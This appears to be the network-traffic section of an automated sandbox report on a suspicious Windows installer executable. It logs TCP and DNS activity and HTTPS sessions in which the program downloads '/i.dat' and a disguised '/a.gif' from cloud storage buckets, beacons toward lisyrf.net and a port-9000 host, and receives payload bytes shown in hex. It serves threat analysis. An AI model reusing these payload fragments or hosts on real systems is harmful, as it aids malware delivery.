Dec 24, 2024 15:13:43.058449030 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.058542013 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.065329075 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.065411091 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.070903063 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.070980072 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.077402115 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.077476025 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.081363916 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.081424952 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.088946104 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.089010954 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.182266951 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.182379007 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.186753035 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.186825991 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.192920923 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.192998886 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.196068048 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.196135044 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.202374935 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.202445030 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.207367897 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.207432985 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.209983110 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.210057974 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.216223955 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.216293097 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.220371008 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.220446110 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.222672939 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.222743034 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.228045940 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.228120089 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.232680082 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.232748985 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.235364914 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.235449076 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.240437031 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.240521908 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.245369911 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.245441914 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.250366926 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.250443935 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.253027916 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.253098965 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.257929087 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.258007050 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.263027906 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.263231039 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.266905069 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.266993046 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.269414902 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.269490957 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.274591923 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.274661064 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.279491901 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.279568911 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.284544945 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.284617901 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.287147999 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.287220001 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.292176008 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.292248964 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.297162056 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.297234058 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.299709082 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.299788952 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.373661041 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.373857021 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.377275944 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.377351999 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.379448891 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.379515886 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.383362055 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.383424044 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.387075901 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.387145042 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.389174938 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.389241934 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.392700911 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.392784119 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.396356106 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.396420956 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.398101091 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.398164034 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.401642084 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.401712894 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.405056000 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.405118942 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.406932116 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.407017946 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.410202980 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.410269022 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.413342953 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.413407087 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.416549921 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.416611910 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.418425083 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.418497086 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.421478033 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.421561956 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.424534082 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.424607038 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.426147938 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.426209927 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.428790092 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.428849936 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.431600094 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.431663036 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.434550047 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.434608936 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.437638044 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.437699080 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.439351082 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.439409971 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.442374945 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.442471027 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.445472956 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.445532084 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.447061062 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.447108030 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.450089931 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.450148106 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.453135014 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.453191042 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.454801083 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.454868078 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.565650940 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.565834045 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.567302942 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.567384958 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.568520069 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.568591118 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.568615913 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.568676949 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.568686962 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.568747044 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.575162888 CET	49839	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.575186968 CET	443	49839	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.997359991 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.997478962 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:43.997561932 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.997853041 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:43.997891903 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.349519968 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.349617958 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.350101948 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.350125074 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.350277901 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.350285053 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.981040001 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.981115103 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.981163025 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.981223106 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.981276989 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.981333017 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:46.997395992 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:46.997494936 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.014214039 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.014297962 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.022600889 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.022677898 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.169378042 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.169455051 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.180522919 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.180599928 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.195225954 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.195302963 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.202867031 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.202938080 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.217533112 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.217617989 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.224823952 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.224886894 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.224905968 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.224971056 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.225004911 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.225164890 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.228791952 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.228822947 CET	443	49850	118.178.60.9	192.168.2.4
Dec 24, 2024 15:13:47.228847027 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:47.228919029 CET	49850	443	192.168.2.4	118.178.60.9
Dec 24, 2024 15:13:48.036127090 CET	49857	9000	192.168.2.4	8.212.102.187
Dec 24, 2024 15:13:48.155642033 CET	9000	49857	8.212.102.187	192.168.2.4
Dec 24, 2024 15:13:48.155747890 CET	49857	9000	192.168.2.4	8.212.102.187
Dec 24, 2024 15:13:49.021028042 CET	49857	9000	192.168.2.4	8.212.102.187
Dec 24, 2024 15:13:49.140796900 CET	9000	49857	8.212.102.187	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 15:12:13.209245920 CET	63254	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:12:13.840743065 CET	53	63254	1.1.1.1	192.168.2.4
Dec 24, 2024 15:12:56.899585009 CET	50741	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:12:57.507013083 CET	53	50741	1.1.1.1	192.168.2.4
Dec 24, 2024 15:13:46.950401068 CET	63006	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:13:47.201986074 CET	53	63006	1.1.1.1	192.168.2.4
Dec 24, 2024 15:13:53.252099037 CET	56580	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:13:53.390599966 CET	53	56580	1.1.1.1	192.168.2.4
Dec 24, 2024 15:13:59.421149969 CET	58830	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:13:59.558947086 CET	53	58830	1.1.1.1	192.168.2.4
Dec 24, 2024 15:14:05.624264002 CET	63849	53	192.168.2.4	1.1.1.1
Dec 24, 2024 15:14:05.762120962 CET	53	63849	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 15:12:13.209245920 CET	192.168.2.4	1.1.1.1	0xeb1b	Standard query (0)	jx2zg4.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:12:56.899585009 CET	192.168.2.4	1.1.1.1	0xf15b	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:46.950401068 CET	192.168.2.4	1.1.1.1	0x268c	Standard query (0)	lisyrf.net	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:53.252099037 CET	192.168.2.4	1.1.1.1	0x8da6	Standard query (0)	lisyrf.net	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:59.421149969 CET	192.168.2.4	1.1.1.1	0xdc1a	Standard query (0)	lisyrf.net	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:14:05.624264002 CET	192.168.2.4	1.1.1.1	0x4690	Standard query (0)	lisyrf.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 15:12:13.840743065 CET	1.1.1.1	192.168.2.4	0xeb1b	No error (0)	jx2zg4.oss-cn-beijing.aliyuncs.com	sc-21lo.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 15:12:13.840743065 CET	1.1.1.1	192.168.2.4	0xeb1b	No error (0)	sc-21lo.cn-beijing.oss-adns.aliyuncs.com	sc-21lo.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 15:12:13.840743065 CET	1.1.1.1	192.168.2.4	0xeb1b	No error (0)	sc-21lo.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.20	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:12:57.507013083 CET	1.1.1.1	192.168.2.4	0xf15b	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 15:12:57.507013083 CET	1.1.1.1	192.168.2.4	0xf15b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 24, 2024 15:12:57.507013083 CET	1.1.1.1	192.168.2.4	0xf15b	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:47.201986074 CET	1.1.1.1	192.168.2.4	0x268c	Name error (3)	lisyrf.net	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:53.390599966 CET	1.1.1.1	192.168.2.4	0x8da6	Name error (3)	lisyrf.net	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:13:59.558947086 CET	1.1.1.1	192.168.2.4	0xdc1a	Name error (3)	lisyrf.net	none	none	A (IP address)	IN (0x0001)	false
Dec 24, 2024 15:14:05.762120962 CET	1.1.1.1	192.168.2.4	0x4690	Name error (3)	lisyrf.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jx2zg4.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:16 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:16 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:16 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 676AC140820F3F3233D7E4E0 Accept-Ranges: bytes ETag: "ED0A14F8C97399523A83157F9EDC6D96" Last-Modified: Tue, 24 Dec 2024 11:59:19 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 17804587328255597003 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7QoU+MlzmVI6gxV/ntxtlg== x-oss-server-time: 3
2024-12-24 14:12:16 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 5a 48 02 4a 2d 7e 64 25 56 56 08 46 28 6b 24 23 4a 49 4a 4d 2a 63 2c 21 48 58 54 4f 2c 3c 61 2c 43 41 03 4d 63 2a 24 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 43 5f 5f 5b 28 61 74 74 1e 0c 46 0e 69 3a 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 59 4b 01 49 2e 7d 67 26 55 55 0b 45 2b 68 27 20 49 4a 49 4e 29 60 2f 22 4b 5b 57 4c 2f 3f 62 2f 40 42 00 4c 62 2b 25 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 42 5e 5e 5a 29 60 75 75 1f 0d 47 0f 68 3b 21 Data Ascii: l%00ZHJ-~d%VVF(k$#JIJMc,!HXTO,<a,CAMc$+++++++++++++++++++++++++++++++++C__[(attFi: aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33YKI.}g&UUE+h' IJIN)`/"K[WL/?b/@BLb+%*********************************B^^Z)`uuGh;!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	39.103.20.20	443	6664	C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 14:12:19 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: jx2zg4.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-12-24 14:12:20 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Tue, 24 Dec 2024 14:12:20 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 676AC1440AD0713136DB5C3F Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Tue, 24 Dec 2024 11:58:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 2
2024-12-24 14:12:20 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2024-12-24 14:12:20 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
